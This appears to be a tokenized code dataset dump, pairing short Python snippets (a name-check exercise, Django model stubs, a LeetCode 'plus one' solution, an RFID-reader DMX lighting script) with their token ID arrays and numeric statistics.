19798,
292,
198,
11748,
350,
4146,
13,
5159,
355,
5560,
198,
11748,
299,
32152,
198,
11748,
4423,
346,
198,
6738,
1341,
35720,
13,
19849,
62,
49283,
1330,
4512,
62,
9288,
62,
35312,
355,
1745,
448,
198,
6738,
... | 2.541099 | 2,421 |
nome = str(input("Nome: ")).strip()
print('o nome tem silva {}'.format('silva' in nome.lower()))
| [
77,
462,
796,
965,
7,
15414,
7203,
45,
462,
25,
366,
29720,
36311,
3419,
198,
4798,
10786,
78,
299,
462,
2169,
3313,
6862,
23884,
4458,
18982,
10786,
18217,
6862,
6,
287,
299,
462,
13,
21037,
3419,
4008,
198
] | 2.552632 | 38 |
# coding:utf-8
from django.contrib.auth.models import AbstractUser, Permission
from django.db import models
# 部门
# 用户管理模块models
# class PermissionRead(models.Model):
# read_permission = models.OneToOneField(Permission, verbose_name='子模块权限')
# 全站管理models
# 配置管理分组
| [
2,
19617,
25,
40477,
12,
23,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
27530,
1330,
27741,
12982,
11,
2448,
3411,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
628,
198,
2,
16268,
225,
101,
29785,
101,
628,
198,
2,
133... | 1.912752 | 149 |
# encoding='utf-8'
'''
/**
* This is the solution of No. 66 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/plus-one
* <p>
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
* <p>
* 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
* <p>
* 你可以假设除了整数 0 之外,这个整数不会以零开头。
* <p>
* 示例 1:
* <p>
* 输入: [1,2,3]
* 输出: [1,2,4]
* 解释: 输入数组表示数字 123。
* 示例 2:
* <p>
* 输入: [4,3,2,1]
* 输出: [4,3,2,2]
* 解释: 输入数组表示数字 4321。
* <p>
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/plus-one
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
if __name__ == '__main__':
digits = [9, 9]
solution = Solution()
result = solution.plus_one2(digits)
print(result)
assert result == [1, 0, 0]
| [
2,
21004,
11639,
40477,
12,
23,
6,
198,
198,
7061,
6,
198,
35343,
198,
1635,
770,
318,
262,
4610,
286,
1400,
13,
7930,
1917,
287,
262,
1004,
316,
10669,
11,
198,
1635,
262,
3052,
286,
262,
1917,
318,
355,
1061,
25,
198,
1635,
3740... | 1.555556 | 684 |
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
# RFID Read
#
import os,sys
import json
import time
import rfidiot
from RFIDapi import *
import array
from ola.ClientWrapper import ClientWrapper
import config
barSignal = 0
dmxwrapper = ClientWrapper()
dmxuniverse = 1
readerid = config.settings['readerID']
print readerid
####################### DMX FUNCTIONS ################
# Card reader Functions
def open_reader():
""" Attempts to open the card reader """
try:
card = rfidiot.card
return card
except:
print "Couldn't open reader!"
sys.exit()
return None
def listen(card, interval):
""" Listens for a card to be placed on the reader """
while 1:
if card.select():
#confirmationDMX()
# print readerid
post = logAction(readerid, card.uid, "ACT")
data = getVistorActions(card.uid)
print data
if (data['visitortype'] == 'Basic'):
basicDMX()
elif (data['visitortype'] == 'Premium'):
premiumDMX()
elif (data['visitortype'] == 'Premium VIP'):
premiumVIPDMX()
# elif (data['percentile'] <= 20):
# # INSERT DMX CODE HERE KASPER
# p20DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 40):
# p40DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 60):
# p60DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 80):
# p60DMX(data['visitortype'])
# break
# else:
# p100DMX(data['visitortype'])
# break
def listen_remove(card, interval, card_id):
""" Listens for a card to be placed on the reader """
# Screen.wrapper(datascreen)
while 1:
screensaverstate = 1
if not card.select():
# data = json.dumps({"card_info":
# [{"card_id": card_id}, {"timedate": get_time()}, {"action": "Removed"}]})
# print(data)
break
#print "Waiting: Card Removal"
time.sleep(interval)
return None
##setup stuff
# Open the card reader
card = open_reader()
card_info = card.info('cardselect v0.1m')
# Main loop
try:
while 1:
card_id = listen(card, 0.1)
listen_remove(card, 0.1, card_id)
except KeyboardInterrupt:
print "keyboard interrupt!"
| [
2,
48443,
14629,
14,
12001,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
628,
198,
2,
198,
2,
20445,
2389,
4149,
198,
2,
198,
198,
11748,
28686,
11,
17597,
198,
11748,
33918,
198,
11748,
640,... | 2.048839 | 1,249 |
import os
| [
11748,
28686,
198,
220,
220,
198,
220,
220,
198,
220,
220,
198
] | 1.583333 | 12 |